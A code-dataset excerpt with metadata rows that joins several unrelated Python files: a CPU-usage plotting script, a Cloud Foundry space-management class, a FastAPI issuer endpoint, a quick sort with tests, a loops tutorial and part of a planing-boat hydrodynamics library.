dplt.legend(labels=cols, bbox_to_anchor=(0.65, -0.2), loc='upper left', ncol=2, mode="expand", prop={'size': 6})
dplt.set(ylabel = "Milliseconds of CPU time used per second")
dplt.set_title("CPU Usage By Container")
df["cpu_all"] = df[cols].sum(axis=1)
df["cpu_all"] = df["cpu_all"].replace("undefined", "nan")
df["cpu_all"] = df["cpu_all"].astype(float, errors='ignore')*1000 # change to milliseconds
hplt = sns.lineplot(data=df, x="Time", y="cpu_all", ax=ax2)
hplt.set(ylabel="Milliseconds of CPU time used per second")
hplt.set_title("CPU Usage Of All Containers")
plt.subplots_adjust(bottom=0.6, right=1)
print("Saving to: ", output)
plt.savefig(output)
def main(args):
return graph(args.title, args.source, args.output)
if __name__ == '__main__':
path = pathlib.Path().absolute()
parser = argparse.ArgumentParser()
parser.add_argument("-t",
"--title",
dest="title",
default="CPU Usage By Container",
help="Specifies title of graph.")
parser.add_argument("-s",
"--source",
dest="source",
default=f"{path}/Kubernetes_Container_-_CPU_usage_time_[RATE].csv",
help="Specifies source of data.")
parser.add_argument("-o",
"--output",
dest="output",
default="cpu_plot.png",
help="Specifies where graph is saved.")
arguments = parser.parse_args()
main(arguments)
| 42.963855 | 124 | 0.530006 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 706 | 0.197981 |
0dd4787568192c17a9f65ae09cd6486c8711bd89 | 4,920 | py | Python | predix/admin/cf/spaces.py | Saifinbox/predix | d4a69da0adbc503fcf5d569e91c8ebb1aeac0605 | [
"BSD-3-Clause"
] | null | null | null | predix/admin/cf/spaces.py | Saifinbox/predix | d4a69da0adbc503fcf5d569e91c8ebb1aeac0605 | [
"BSD-3-Clause"
] | null | null | null | predix/admin/cf/spaces.py | Saifinbox/predix | d4a69da0adbc503fcf5d569e91c8ebb1aeac0605 | [
"BSD-3-Clause"
] | null | null | null |
import logging
import predix.admin.cf.api
import predix.admin.cf.orgs
import predix.admin.cf.apps
import predix.admin.cf.services
class Space(object):
"""
Operations and data for Cloud Foundry Spaces.
"""
def __init__(self, *args, **kwargs):
super(Space, self).__init__(*args, **kwargs)
self.api = predix.admin.cf.api.API()
self.name = self.api.config.get_space_name()
self.guid = self.api.config.get_space_guid()
self.org = predix.admin.cf.orgs.Org()
def _get_spaces(self):
"""
Get the marketplace services.
"""
guid = self.api.config.get_organization_guid()
uri = '/v2/organizations/%s/spaces' % (guid)
return self.api.get(uri)
def get_spaces(self):
"""
Return a flat list of the names for spaces in the organization.
"""
self.spaces = []
for resource in self._get_spaces()['resources']:
self.spaces.append(resource['entity']['name'])
return self.spaces
def get_space_services(self):
"""
Returns the services available for use in the space. This may
not always be the same as the full marketplace.
"""
uri = '/v2/spaces/%s/services' % (self.guid)
return self.api.get(uri)
def create_space(self, space_name):
"""
Create a new space of the given name.
"""
body = {
'name': space_name,
'organization_guid': self.api.config.get_organization_guid()
}
return self.api.post('/v2/spaces', body)
def delete_space(self, space_name):
"""
Delete a space of the given name.
"""
return self.api.delete("/v2/spaces/%s" % (self.guid))
def get_space_summary(self):
"""
Returns a summary of apps and services within a given
cloud foundry space.
It is the call used by `cf s` or `cf a` for quicker
responses.
"""
uri = '/v2/spaces/%s/summary' % (self.guid)
return self.api.get(uri)
def _get_apps(self):
"""
Returns raw results for all apps in the space.
"""
uri = '/v2/spaces/%s/apps' % (self.guid)
return self.api.get(uri)
def get_apps(self):
"""
Returns a list of all of the apps in the space.
"""
apps = []
for resource in self._get_apps()['resources']:
apps.append(resource['entity']['name'])
return apps
def has_app(self, app_name):
"""
Simple test to see if we have a name conflict
for the application.
"""
return app_name in self.get_apps()
def _get_services(self):
"""
Return the available services for this space.
"""
uri = '/v2/spaces/%s/services' % (self.guid)
return self.api.get(uri)
def get_services(self):
"""
Returns a flat list of the service names available
from the marketplace for this space.
"""
services = []
for resource in self._get_services()['resources']:
services.append(resource['entity']['label'])
return services
def _get_instances(self):
"""
Returns the service instances activated in this space.
"""
uri = '/v2/spaces/%s/service_instances' % (self.guid)
return self.api.get(uri)
def get_instances(self):
"""
Returns a flat list of the names of services created
in this space.
"""
services = []
for resource in self._get_instances()['resources']:
services.append(resource['entity']['name'])
return services
def has_service_with_name(self, service_name):
"""
Tests whether a service with the given name exists in
this space.
"""
return service_name in self.get_instances()
def has_service_of_type(self, service_type):
"""
Tests whether a service instance exists for the given
service.
"""
summary = self.get_space_summary()
for instance in summary['services']:
if service_type == instance['service_plan']['service']['label']:
return True
return False
def purge(self):
"""
Remove all services and apps from the space.
Will leave the space itself, call delete_space() if you
want to remove that too.
Similar to `cf delete-space -f <space-name>`.
"""
logging.warn("Purging all services from space %s" %
(self.name))
service = predix.admin.cf.services.Service()
for service_name in self.get_instances():
service.purge(service_name)
apps = predix.admin.cf.apps.App()
for app_name in self.get_apps():
apps.delete_app(app_name)
| 28.114286 | 76 | 0.57378 | 4,785 | 0.972561 | 0 | 0 | 0 | 0 | 0 | 0 | 2,045 | 0.41565 |
0dd5ea13d1486dc2358d111b35e9609c1546878c | 953 | py | Python | services/traction/api/endpoints/routes/v1/tenant/admin/issuer.py | bcgov/traction | 90cec4f1aebccd68eb986cb89dfae5819a07a2ee | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/api/endpoints/routes/v1/tenant/admin/issuer.py | bcgov/traction | 90cec4f1aebccd68eb986cb89dfae5819a07a2ee | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/api/endpoints/routes/v1/tenant/admin/issuer.py | bcgov/traction | 90cec4f1aebccd68eb986cb89dfae5819a07a2ee | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | import logging
from fastapi import APIRouter
from starlette import status
from api.endpoints.dependencies.tenant_security import get_from_context
from api.endpoints.models.v1.tenant import TenantGetResponse
from api.services.v1 import tenant_service
router = APIRouter()
logger = logging.getLogger(__name__)
@router.post(
"/make-issuer", status_code=status.HTTP_200_OK, response_model=TenantGetResponse
)
async def initialize_issuer() -> TenantGetResponse:
"""
If the innkeeper has authorized your tenant to become an issuer, initialize
here to write a endorsed public did the configured Hyperledger-Indy service
"""
wallet_id = get_from_context("TENANT_WALLET_ID")
tenant_id = get_from_context("TENANT_ID")
item = await tenant_service.make_issuer(
tenant_id,
wallet_id,
)
links = [] # TODO: determine useful links for /make-issuer
return TenantGetResponse(item=item, links=links)
| 26.472222 | 84 | 0.757608 | 0 | 0 | 0 | 0 | 636 | 0.667366 | 535 | 0.561385 | 261 | 0.273872 |
0dd723ba9c179cbdcdb30d82337ea92feb517a2e | 1,573 | py | Python | problems/sorting/quick_sort.py | colin-valentini/python-utils | 7bbbf6603c050291ee56df266257a351919f5e04 | [
"MIT"
] | null | null | null | problems/sorting/quick_sort.py | colin-valentini/python-utils | 7bbbf6603c050291ee56df266257a351919f5e04 | [
"MIT"
] | 1 | 2021-02-27T23:35:17.000Z | 2021-02-27T23:38:49.000Z | problems/sorting/quick_sort.py | colin-valentini/python | 7bbbf6603c050291ee56df266257a351919f5e04 | [
"MIT"
] | null | null | null |
def quick_sort(array):
'''
Prototypical quick sort algorithm using Python
Time and Space Complexity:
* Best: O(n * log(n)) time | O(log(n)) space
* Avg: O(n * log(n)) time | O(log(n)) space
* Worst: O(n^2) time | O(log(n)) space
'''
return _quick_sort(array, 0, len(array)-1)
def _quick_sort(array, start, end):
# We don't need to sort an array of size 1 (already sorted), or less
if start >= end:
return
pivot = partition(array, start, end)
_quick_sort(array, start, pivot-1)
_quick_sort(array, pivot+1, end)
def partition(array, start, end):
pivot, pivotVal = start, array[start]
left, right = start+1, end
while left <= right:
if array[left] > pivotVal and array[right] < pivotVal:
swap(array, left, right)
if array[left] <= pivotVal:
left += 1
if pivotVal <= array[right]:
right -= 1
swap(array, pivot, right)
return right
def swap(array, i, j):
'''
Swaps the value at the i-th index with the value at the j-th index in place.
'''
if i < 0 or i > len(array)-1:
raise IndexError(f'Index <i> of {i} is not a valid index of <array>')
elif j < 0 or j > len(array)-1:
raise IndexError(f'Index <j> of {j} is not a valid index of <array>')
elif i == j:
return
array[i], array[j] = array[j], array[i]
test_cases = [
[],
[3,2],
[2,3,1],
[1,2,3],
[33, 33, 33, 33, 33],
[33, 33, 33, 33, 44],
[16, 1, 53, 99, 16, 9, 100, 300, 12],
]
for test_case in test_cases:
result = test_case.copy()
quick_sort(result)
assert result == sorted(test_case) | 24.578125 | 78 | 0.607756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 486 | 0.308964 |
0dd777da72c858ecb1ea267bb078c8de582008a6 | 1,618 | py | Python | learning_files/loops.py | MineJockey/python-basics | bd0370413362c69e55fc81366d8c995875f9308a | [
"MIT"
] | null | null | null | learning_files/loops.py | MineJockey/python-basics | bd0370413362c69e55fc81366d8c995875f9308a | [
"MIT"
] | null | null | null | learning_files/loops.py | MineJockey/python-basics | bd0370413362c69e55fc81366d8c995875f9308a | [
"MIT"
] | null | null | null | def loops():
# String Array
names = ["Apple", "Orange", "Pear"]
# \n is a newline in a string
print('\n---------------')
print(' For Each Loop')
print('---------------\n')
# For Each Loop
for i in names:
print(i)
print('\n---------------')
print(' For Loop')
print('---------------\n')
# For Loop
# the range() function can take a min, max, and interval
# value, max is non-inclusive i.e. 101 stops at 100
# example: range(0, 101, 2)
for i in range(5):
if i == 1:
print('1, continue')
# continue will move to the next iteration in the loop
continue
elif i == 3:
print('3, break')
# the break statement will end the loop
break
# if the number doesn't fit the conditions above
# it will be printed to the console
print(i)
print('\n---------------')
print(' While Loop')
print('---------------\n')
# Boolean variables hold True or False, 0 or 1
loop = True
# Integer variables hold whole numbers
iterations = 0
max_iterations = 10
print('0 -', max_iterations, '\n')
# The while loop will run as long as the given
# condition or variable is true
# Parentheses are optional
while loop:
# the += operator adds the given value to
# the current value of a variable
iterations += 1
print(iterations)
if iterations == max_iterations:
# break will end a loops execution
break
if __name__ == '__main__':
loops()
| 25.68254 | 66 | 0.524722 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 893 | 0.551916 |
0dd779133e9d6620bb5632b19fd63b4c804181f6 | 52,299 | py | Python | openplaning/openplaning.py | elcf/python-openplaning | 58c5db7b2c42e951138430db883759b6143f4adc | [
"MIT"
] | 1 | 2021-12-17T00:30:40.000Z | 2021-12-17T00:30:40.000Z | openplaning/openplaning.py | AltamiroAJ/python-openplaning | 5dbb7ec83257173673651c098d8406c38f5c3bb8 | [
"MIT"
] | 1 | 2021-09-20T15:12:15.000Z | 2021-09-21T18:02:46.000Z | openplaning/openplaning.py | AltamiroAJ/python-openplaning | 5dbb7ec83257173673651c098d8406c38f5c3bb8 | [
"MIT"
] | 1 | 2021-12-17T00:30:42.000Z | 2021-12-17T00:30:42.000Z | import numpy as np
from scipy import interpolate, signal
from scipy.special import gamma
import ndmath
import warnings
import pkg_resources
class PlaningBoat():
"""Prismatic planing craft
Attributes:
speed (float): Speed (m/s). It is an input to :class:`PlaningBoat`.
weight (float): Weight (N). It is an input to :class:`PlaningBoat`.
beam (float): Beam (m). It is an input to :class:`PlaningBoat`.
lcg (float): Longitudinal center of gravity, measured from the stern (m). It is an input to :class:`PlaningBoat`.
vcg (float): Vertical center of gravity, measured from the keel (m). It is an input to :class:`PlaningBoat`.
r_g (float): Radius of gyration (m). It is an input to :class:`PlaningBoat`.
beta (float): Deadrise (deg). It is an input to :class:`PlaningBoat`.
epsilon (float): Thrust angle w.r.t. keel, CCW with body-fixed origin at 9 o'clock (deg). It is an input to :class:`PlaningBoat`.
vT (float): Thrust vertical distance, measured from keel, and positive up (m). It is an input to :class:`PlaningBoat`.
lT (float): Thrust horizontal distance, measured from stern, and positive forward (m). It is an input to :class:`PlaningBoat`.
length (float): Vessel LOA for seaway behavior estimates (m). Defaults to None. It is an input to :class:`PlaningBoat`.
H_sig (float): Significant wave heigth in an irregular sea state (m). Defaults to None. It is an input to :class:`PlaningBoat`.
ahr (float): Average hull roughness (m). Defaults to 150*10**-6. It is an input to :class:`PlaningBoat`.
Lf (float): Flap chord (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
sigma (float): Flap span-beam ratio (dimensionless). Defaults to 0. It is an input to :class:`PlaningBoat`.
delta (float): Flap deflection (deg). Defaults to 0. It is an input to :class:`PlaningBoat`.
l_air (float): Distance from stern to center of air pressure (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
h_air (float): Height from keel to top of square which bounds the air-drag-inducing area (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
b_air (float): Transverse width of square which bounds the air-drag-inducing area (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
C_shape (float): Area coefficient for air-drag-inducing area (dimensionless). C_shape = 1 means the air drag reference area is h_air*b_air. Defaults to 0. It is an input to :class:`PlaningBoat`.
C_D (float): Air drag coefficient (dimensionless). Defaults to 0.7. It is an input to :class:`PlaningBoat`.
rho (float): Water density (kg/m^3). Defaults to 1025.87. It is an input to :class:`PlaningBoat`.
nu (float): Water kinematic viscosity (m^2/s). Defaults to 1.19*10**-6. It is an input to :class:`PlaningBoat`.
rho_air (float): Air density (kg/m^3). Defaults to 1.225. It is an input to :class:`PlaningBoat`.
g (float): Gravitational acceleration (m/s^2). Defaults to 9.8066. It is an input to :class:`PlaningBoat`.
z_wl (float): Vertical distance of center of gravity to the calm water line (m). Defaults to 0. It is an input to :class:`PlaningBoat`, but modified when running :meth:`get_steady_trim`.
tau (float): Trim angle (deg). Defaults to 5. It is an input to :class:`PlaningBoat`, but modified when running :meth:`get_steady_trim`.
eta_3 (float): Additional heave (m). Initiates to 0.
eta_5 (float): Additional trim (deg). Initiates to zero.
wetted_lengths_type (int): 1 = Use Faltinsen 2005 wave rise approximation, 2 = Use Savitsky's '64 approach, 3 = Use Savitsky's '76 approach. Defaults to 1. It is an input to :class:`PlaningBoat`.
z_max_type (int): 1 = Uses 3rd order polynomial fit, 2 = Uses cubic interpolation from table. This is only used if wetted_lenghts_type == 1. Defaults to 1. It is an input to :class:`PlaningBoat`.
L_K (float): Keel wetted length (m). It is updated when running :meth:`get_geo_lengths`.
L_C (float): Chine wetted length (m). It is updated when running :meth:`get_geo_lengths`.
lambda_W (float): Mean wetted-length to beam ratio, (L_K+L_C)/(2*beam) (dimensionless). It is updated when running :meth:`get_geo_lengths`.
x_s (float): Distance from keel/water-line intersection to start of wetted chine (m). It is updated when running :meth:`get_geo_lengths`.
z_max (float): Maximum pressure coordinate coefficient, z_max/Ut (dimensionless). It is updated when running :meth:`get_geo_lengths`.
hydrodynamic_force ((3,) ndarray): Hydrodynamic force (N, N, N*m). [F_x, F_z, M_cg] with x, y, rot directions in intertial coordinates. It is updated when running :meth:`get_forces`.
skin_friction ((3,) ndarray): Skin friction force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
air_resistance ((3,) ndarray): Air resistance force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
flap_force ((3,) ndarray): Flap resultant force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
thrust_force ((3,) ndarray): Thrust resultant force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
net_force ((3,) ndarray): Net force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
mass_matrix ((2, 2) ndarray): Mass coefficients matrix. [[A_33 (kg), A_35 (kg*m/rad)], [A_53 (kg*m), A_55 (kg*m^2/rad)]]. It is updated when running :meth:`get_eom_matrices`.
damping_matrix ((2, 2) ndarray): Damping coefficients matrix. [[B_33 (kg/s), B_35 (kg*m/(s*rad))], [B_53 (kg*m/s), B_55 (kg*m**2/(s*rad))]]. It is updated when running :meth:`get_eom_matrices`.
restoring_matrix ((2, 2) ndarray): Restoring coefficients matrix. [[C_33 (N/m), C_35 (N/rad)], [C_53 (N), C_55 (N*m/rad)]]. It is updated when running :meth:`get_eom_matrices`.
porpoising (list): [[eigenvalue result (bool), est. pitch settling time (s)], [Savitsky chart result (bool), critical trim angle (deg)]]. It is updated when running :meth:`check_porpoising`.
seaway_drag_type (int): 1 = Use Savitsky's '76 approximation, 2 = Use Fridsma's '71 designs charts. Defaults to 1. It is an input to :class:`PlaningBoat`.
avg_impact_acc ((2,) ndarray): Average impact acceleration at center of gravity and bow (g's). [n_cg, n_bow]. It is updated when running :meth:`get_seaway_behavior`.
R_AW (float): Added resistance in waves (N). It is updated when running :meth:`get_seaway_behavior`.
"""
def __init__(self, speed, weight, beam, lcg, vcg, r_g, beta, epsilon, vT, lT, length=None, H_sig=None, ahr=150e-6, Lf=0, sigma=0, delta=0, l_air=0, h_air=0, b_air=0, C_shape=0, C_D=0.7, z_wl=0, tau=5, rho=1025.87, nu=1.19e-6, rho_air=1.225, g=9.8066, wetted_lengths_type=1, z_max_type=1, seaway_drag_type=1):
"""Initialize attributes for PlaningBoat
Args:
speed (float): Speed (m/s).
weight (float): Weidght (N).
beam (float): Beam (m).
lcg (float): Longitudinal center of gravity, measured from the stern (m).
vcg (float): Vertical center of gravity, measured from the keel (m).
r_g (float): Radius of gyration (m).
beta (float): Deadrise (deg).
epsilon (float): Thrust angle w.r.t. keel, CCW with body-fixed origin at 9 o'clock (deg).
vT (float): Thrust vertical distance, measured from keel, and positive up (m).
lT (float): Thrust horizontal distance, measured from stern, and positive forward (m).
length (float, optional): Vessel LOA for seaway behavior estimates (m). Defaults to None.
H_sig (float, optional): Significant wave heigth in an irregular sea state (m). Defaults to None.
ahr (float, optional): Average hull roughness (m). Defaults to 150*10**-6.
Lf (float, optional): Flap chord (m). Defaults to 0.
sigma (float, optional): Flap span-beam ratio (dimensionless). Defaults to 0.
delta (float, optional): Flap deflection (deg). Defaults to 0.
l_air (float, optional): Distance from stern to center of air pressure (m). Defaults to 0.
h_air (float, optional): Height from keel to top of square which bounds the air-drag-inducing area (m). Defaults to 0.
b_air (float, optional): Transverse width of square which bounds the air-drag-inducing area (m). Defaults to 0.
C_shape (float, optional): Area coefficient for air-drag-inducing area (dimensionless). C_shape = 1 means the air drag reference area is h_air*b_air. Defaults to 0.
C_D (float, optional): Air drag coefficient (dimensionless). Defaults to 0.7.
z_wl (float, optional): Vertical distance of center of gravity to the calm water line (m). Defaults to 0.
tau (float, optional): Trim angle (deg). Defaults to 5.
rho (float, optional): Water density (kg/m^3). Defaults to 1025.87.
nu (float, optional): Water kinematic viscosity (m^2/s). Defaults to 1.19*10**-6.
rho_air (float, optional): Air density (kg/m^3). Defaults to 1.225.
g (float, optional): Gravitational acceleration (m/s^2). Defaults to 9.8066.
wetted_lengths_type (int, optional): 1 = Use Faltinsen 2005 wave rise approximation, 2 = Use Savitsky's '64 approach, 3 = Use Savitsky's '76 approach. Defaults to 1.
z_max_type (int, optional): 1 = Uses 3rd order polynomial fit, 2 = Uses cubic interpolation from table. This is only used if wetted_lenghts_type == 1. Defaults to 1.
seaway_drag_type (int, optional): 1 = Use Savitsky's '76 approximation, 2 = Use Fridsma's '71 designs charts. Defaults to 1.
"""
self.speed = speed
self.weight = weight
self.beam = beam
self.lcg = lcg
self.vcg = vcg
self.r_g = r_g
self.beta = beta
self.epsilon = epsilon
self.vT = vT
self.lT = lT
self.length = length
self.H_sig = H_sig
self.ahr = ahr
self.Lf = Lf
self.sigma = sigma
self.delta = delta
self.l_air = l_air
self.h_air = h_air
self.b_air= b_air
self.C_shape = C_shape
self.z_wl = z_wl
self.tau = tau
self.eta_3 = 0
self.eta_5 = 0
self.rho = rho
self.nu = nu
self.rho_air = rho_air
self.C_D = C_D
self.g = g
self.gravity_force = np.array([0, -self.weight, 0])
self.wetted_lengths_type = wetted_lengths_type
self.z_max_type = z_max_type
self.seaway_drag_type = seaway_drag_type
def print_description(self, sigFigs=7, runAllFunctions=True):
"""Returns a formatted description of the vessel.
Args:
sigFigs (int, optional): Number of significant figures to display. Defaults to 7.
runAllFunctions (bool, optional): Runs all functions with default values before printing results. Defaults to True.
"""
if runAllFunctions:
self.get_geo_lengths()
self.get_forces(runGeoLengths=False)
self.get_eom_matrices(runGeoLengths=False)
self.get_seaway_behavior()
self.check_porpoising()
volume = self.weight/(self.g*self.rho)
table = [
['---VESSEL---'],
['Speed', self.speed, 'm/s'],
['V_k', self.speed*1.944, 'knot'],
['Fn (beam)', self.speed/np.sqrt(self.g*self.beam), ''],
['Fn (volume)', self.speed/np.sqrt(self.g*(self.weight/(self.g*self.rho))**(1/3)), ''],
[''],
['Weight', self.weight, 'N'],
['Mass', self.weight/self.g, 'kg'],
['Volume', self.weight/(self.g*self.rho), 'm\u00B3'],
['Beam', self.beam, 'm'],
['LCG', self.lcg, 'm from stern'],
['VCG', self.vcg, 'm from keel'],
['R_g', self.r_g, 'm'],
['Deadrise', self.beta, 'deg'], #'\N{greek small letter beta}'
[''],
['LOA', self.length, 'm'],
['AHR', self.ahr, 'm, average hull roughness'],
[''],
['---ATTITUDE---'],
['z_wl', self.z_wl, 'm, vertical distance of center of gravity to the calm water line'],
['tau', self.tau, 'deg, trim angle'],
['\u03B7\u2083', self.eta_3, 'deg, additional heave'],
['\u03B7\u2085', self.eta_5, 'deg, additional trim'],
['Transom draft', self.L_K*np.sin((self.tau+self.eta_5)*np.pi/180), 'm, draft of keel at transom'],
[''],
['---PROPULSION---'],
['Thrust angle', self.epsilon, 'deg w.r.t. keel (CCW with body-fixed origin at 9 o\'clock)'],
['LCT', self.lT, 'm from stern, positive forward'],
['VCT', self.vT, 'm from keel, positive up'],
[''],
['---FLAP---'],
['Chord', self.Lf, 'm'],
['Span/Beam', self.sigma, ''],
['Angle', self.delta, 'deg w.r.t. keel (CCW with body-fixed origin at 9 o\'clock)'],
[''],
['---AIR DRAG---'],
['l_air', self.l_air, 'm, distance from stern to center of air pressure'],
['h_air', self.h_air, 'm, height from keel to top of square which bounds the air-drag-inducing shape'],
['b_air', self.b_air, 'm, transverse width of square which bounds the air-drag-inducing shape'],
['C_shape', self.C_shape, 'area coefficient for air-drag-inducing shape. C_shape = 1 means the air drag reference area is h_air*b_air'],
['C_D', self.C_D, 'air drag coefficient'],
[''],
['---ENVIRONMENT---'],
['\u03C1', self.rho, 'kg/m\u00B3, water density'],
['\u03BD', self.nu, 'm\u00B2/s, water kinematic viscosity'],
['\u03C1_air', self.rho_air, 'kg/m\u00B3, air density'],
['g', self.g, 'm/s\u00B2, gravitational acceleration'],
[''],
['---WETTED LENGTH OPTIONS---'],
['wetted_lengths_type', self.wetted_lengths_type, '(1 = Use Faltinsen 2005 wave rise approximation, 2 = Use Savitsky\'s \'64 approach, 3 = Use Savitsky\'s \'76 approach)'],
['z_max_type', self.z_max_type, '(1 = Uses 3rd order polynomial fit (faster, recommended), 2 = Use cubic interpolation)'],
[''],
['---WETTED LENGTHS---'],
['L_K', self.L_K, 'm, keel wetted length'],
['L_C', self.L_C, 'm, chine wetted length'],
['\u03BB', self.lambda_W, 'mean wetted-length to beam ratio (L_K+L_C)/(2*beam)'],
['x_s', self.x_s, 'm, distance from keel/water-line intersection to start of wetted chine'],
['z_max', self.z_max, 'maximum pressure coordinate coefficient (z_max/Ut)'],
[''],
['---FORCES [F_x (N, +aft), F_z (N, +up), M_cg (N*m, +pitch up)]---'],
['Hydrodynamic Force', self.hydrodynamic_force, ''],
['Skin Friction', self.skin_friction, ''],
['Air Resistance', self.air_resistance, ''],
['Flap Force', self.flap_force, ''],
['Net Force', self.net_force, ''],
['Resultant Thrust', self.thrust_force, ''],
[''],
['---THURST & POWER---'],
['Thrust Magnitude', np.sqrt(self.thrust_force[0]**2+self.thrust_force[1]**2), 'N'],
['Effective Thrust', -self.thrust_force[0], 'N'],
['Eff. Power', -self.thrust_force[0]*self.speed/1000, 'kW'],
['Eff. Horsepower', -self.thrust_force[0]*self.speed/1000/0.7457, 'hp'],
[''],
['---EOM MATRICES---'],
['Mass matrix, [kg, kg*m/rad; kg*m, kg*m\u00B2/rad]', self.mass_matrix, ''],
['Damping matrix, [kg/s, kg*m/(s*rad); kg*m/s, kg*m\u00B2/(s*rad)]', self.damping_matrix, ''],
['Restoring matrix, [N/m, N/rad; N, N*m/rad]', self.restoring_matrix, ''],
[''],
['---PORPOISING---'],
['[[Eigenvalue check result, Est. pitch settling time (s)],\n [Savitsky chart result, Critical trim angle (deg)]]', np.array(self.porpoising), ''],
[''],
['---BEHAVIOR IN WAVES---'],
['H_sig', self.H_sig, 'm, significant wave heigth'],
['R_AW', self.R_AW, 'N, added resistance in waves'],
['Average impact acceleration [n_cg, n_bow] (g\'s)', self.avg_impact_acc, ''],
]
cLens=[16,0,0] #Min spacing for columns
for row in table:
if len(row)==3:
if row[1] is None:
print('{desc:<{cL0}} {val:<{cL1}} {unit:<{cL2}}'.format(desc=row[0], val=row[1], unit='None', cL0='', cL1=cLens[1], cL2=cLens[2]))
elif isinstance(row[1], (list,np.ndarray)):
print(row[0]+' =')
with np.printoptions(formatter={'float': f'{{:.{sigFigs}g}}'.format}):
print(row[1])
print(row[2])
else:
print('{desc:<{cL0}} {val:<{cL1}.{sNum}g} {unit:<{cL2}}'.format(desc=row[0], val=row[1], unit=row[2], cL0=cLens[0], cL1=cLens[1], cL2=cLens[2], sNum=sigFigs))
else:
print(row[0])
def get_geo_lengths(self):
"""This function outputs the geometric lengths.
Adds/updates the following attributes:
- :attr:`L_K`
- :attr:`L_C`
- :attr:`lambda_W`
- :attr:`x_s`
- :attr:`z_max`
"""
b = self.beam
lcg = self.lcg
vcg = self.vcg
z_wl = self.z_wl
tau = self.tau
beta = self.beta
eta_3 = self.eta_3
eta_5 = self.eta_5
pi = np.pi
wetted_lengths_type = self.wetted_lengths_type
z_max_type = self.z_max_type
#Keel wetted length, Eq. 9.50 of Faltinsen 2005, page 367
L_K = lcg + vcg / np.tan(pi/180*(tau + eta_5)) - (z_wl + eta_3) / np.sin(pi/180*(tau + eta_5))
if L_K < 0:
L_K = 0
if wetted_lengths_type == 1:
#z_max/Vt coefficient, Table 8.3 of Faltinsen 2005, page 303---------------
beta_table = [4, 7.5, 10, 15, 20, 25, 30, 40]
z_max_table = [0.5695, 0.5623, 0.5556, 0.5361, 0.5087, 0.4709, 0.4243, 0.2866]
#Extrapolation warning
if beta < beta_table[0] or beta > beta_table[-1]:
warnings.warn('Deadrise ({0:.3f}) outside the interpolation range of 4-40 deg (Table 8.3 of Faltinsen 2005). Extrapolated values might be inaccurate.'.format(beta), stacklevel=2)
if z_max_type == 1:
z_max = np.polyval([-2.100644618790201e-006, -6.815747611588763e-005, -1.130563334939335e-003, 5.754510457848798e-001], beta)
elif z_max_type == 2:
z_max_func = interpolate.interp1d(beta_table, z_max_table, kind='cubic', fill_value='extrapolate') #Interpolation of the table
z_max = z_max_func(beta)
#--------------------------------------------------------------------------
#Distance from keel/water-line intersection to start of wetted chine (Eq. 9.10 of Faltinsen)
x_s = 0.5 * b * np.tan(pi/180*beta) / ((1 + z_max) * (pi/180)*(tau + eta_5))
if x_s < 0:
x_s = 0
#Chine wetted length, Eq. 9.51 of Faltinsen 2005
L_C = L_K - x_s
if L_C < 0:
L_C = 0
x_s = L_K
warnings.warn('Vessel operating with dry chines (L_C = 0).', stacklevel=2)
#Mean wetted length-to-beam ratio
lambda_W = (L_K + L_C) / (2 * b)
elif wetted_lengths_type == 2:
#Eq. 3 of Savitsky '64
x_s = b/pi*np.tan(pi/180*beta)/np.tan(pi/180*(tau + eta_5))
#Chine wetted length
L_C = L_K - x_s
if L_C < 0:
L_C = 0
x_s = L_K
warnings.warn('Vessel operating with dry chines (L_C = 0).', stacklevel=2)
#Mean wetted length-to-beam ratio
lambda_W = (L_K + L_C)/(2*b)
#z_max/Vt coefficient (E. 9.10 of Faltinsen 2005 rearranged)
z_max = 0.5 * b * np.tan(pi/180*beta) / (x_s * (pi/180)*(tau + eta_5)) - 1
elif wetted_lengths_type == 3:
#Eq. 12 of Savitsky '76
w = (0.57 + beta/1000)*(np.tan(pi/180*beta)/(2*np.tan(pi/180*(tau+eta_5)))-beta/167)
lambda_K = L_K/b
#Eq. 14 of Savitsky '76
lambda_C = (lambda_K-w)-0.2*np.exp(-(lambda_K-w)/0.3)
if lambda_C < 0:
lambda_C = 0
L_C = lambda_C*b
#Mean wetted length-to-beam ratio, Eq. 15 of Savitsky '76
lambda_W = (lambda_K + lambda_C)/2+0.03
x_s = L_K-L_C
#z_max/Vt coefficient (E. 9.10 of Faltinsen 2005 rearranged)
z_max = 0.5 * b * np.tan(pi/180*beta) / (x_s * (pi/180)*(tau + eta_5)) - 1
if self.length is not None:
if L_K > self.length:
warnings.warn('The estimated wetted chine length ({0:.3f}) is larger than the vessel length ({1:.3f}).'.format(L_K, self.length), stacklevel=2)
#Update values
self.L_K = L_K
self.L_C = L_C
self.lambda_W = lambda_W
self.x_s = x_s
self.z_max = z_max
def get_forces(self, runGeoLengths=True):
"""This function calls all the force functions to update the respective object attributes.
Adds/updates the following attributes:
- :attr:`hydrodynamic_force`
- :attr:`skin_friction`
- :attr:`air_resistance`
- :attr:`flap_force`
- :attr:`thrust_force`
- :attr:`net_force`
Args:
runGeoLengths (boolean, optional): Calculate the wetted lengths before calculating the forces. Defaults to True.
Methods:
get_hydrodynamic_force(): This function follows Savitsky 1964 and Faltinsen 2005 in calculating the vessel's hydrodynamic forces and moment.
get_skin_friction(): This function outputs the frictional force of the vessel using ITTC 1957 and the Bowden and Davison 1974 roughness coefficient.
get_air_resistance(): This function estimates the air drag. It assumes a square shape projected area with a shape coefficient.
get_flap_force(): This function outputs the flap forces w.r.t. global coordinates (Savitsky & Brown 1976). Horz: Positive Aft, Vert: Positive Up, Moment: Positive CCW.
